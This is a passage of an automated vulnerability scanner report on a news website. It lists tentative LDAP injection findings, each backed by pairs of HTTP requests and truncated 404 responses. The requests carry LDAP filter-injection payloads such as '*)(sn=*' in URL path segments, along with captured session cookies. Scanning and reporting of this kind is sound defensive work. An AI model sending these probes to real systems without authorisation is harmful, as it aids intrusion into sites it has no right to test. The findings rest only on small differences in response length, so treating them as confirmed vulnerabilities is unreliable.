<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1770697822&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1770697822&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.17. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink

Issue detail

The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.

The payloads 712d97ecb1068be9)(sn=* and 712d97ecb1068be9)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/27/712d97ecb1068be9)(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1621289623&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1621289623&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2011/01/27/712d97ecb1068be9)!(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=426617426&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=426617426&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.18. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:53:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=719173227&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=719173227&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /*)!(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:53:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1350418144&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1350418144&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

2.19. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/

Issue detail

The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/28/*)(sn=*/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=2050009309&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=2050009309&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/2011/01/28/*)!(sn=*/?GT1=43001 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:54:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=521615266&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=521615266&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

2.20. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_static/feeds/3147.xml

Issue detail

Request 1

GET /_static/feeds/*)(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:25:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40123

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1418737154&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1418737154&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a><
...[SNIP]...

Request 2

GET /_static/feeds/*)!(sn=* HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:25:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40105

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=285889559&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
